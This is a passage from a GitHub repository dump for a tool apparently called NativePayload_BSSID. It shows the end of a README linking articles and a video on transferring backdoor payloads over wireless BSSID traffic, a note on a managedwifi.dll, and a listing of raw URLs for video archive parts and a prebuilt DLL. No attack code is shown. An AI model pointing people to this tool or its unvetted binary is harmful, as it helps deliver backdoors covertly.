one of these links: 15 | 16 | link1 : https://www.linkedin.com/pulse/transferring-backdoor-payloads-bssid-wireless-traffic-mohammadbagher 17 | 18 | link2 : https://www.peerlyst.com/posts/transferring-backdoor-payloads-with-bssid-by-wireless-traffic-damon-mohammadbagher 19 | 20 | Video : https://youtu.be/W0dJGln3tls 21 | 22 | 23 | Note : C# Source Code for "managedwifi.dll" is 24 | 25 | link : https://managedwifi.codeplex.com/SourceControl/latest 26 | 27 | 28 | if you want , you can Download this C# Source Code and make your own dll file its better than using this "managedwifi.dll" in github ... 29 | 30 | but this file is ok .... i hope ;) 31 | 32 |

33 | -------------------------------------------------------------------------------- /Video-[v2]/README.md: -------------------------------------------------------------------------------- 1 | # Video [NativePayload_BSSIDv2.wmv] for NativePayload_BSSID.sh v2 2 | -------------------------------------------------------------------------------- /Video-[v2]/Video.NativePayload_BSSIDv2.zip.part-aa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Video-[v2]/Video.NativePayload_BSSIDv2.zip.part-aa -------------------------------------------------------------------------------- /Video-[v2]/Video.NativePayload_BSSIDv2.zip.part-ab: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Video-[v2]/Video.NativePayload_BSSIDv2.zip.part-ab -------------------------------------------------------------------------------- /Video-[v2]/Video.NativePayload_BSSIDv2.zip.part-ac: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Video-[v2]/Video.NativePayload_BSSIDv2.zip.part-ac -------------------------------------------------------------------------------- /Video-[v2]/Video.NativePayload_BSSIDv2.zip.part-ad: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Video-[v2]/Video.NativePayload_BSSIDv2.zip.part-ad -------------------------------------------------------------------------------- /Video-[v2]/Video.NativePayload_BSSIDv2.zip.part-ae: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Video-[v2]/Video.NativePayload_BSSIDv2.zip.part-ae -------------------------------------------------------------------------------- /managedwifi.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/managedwifi.dll --------------------------------------------------------------------------------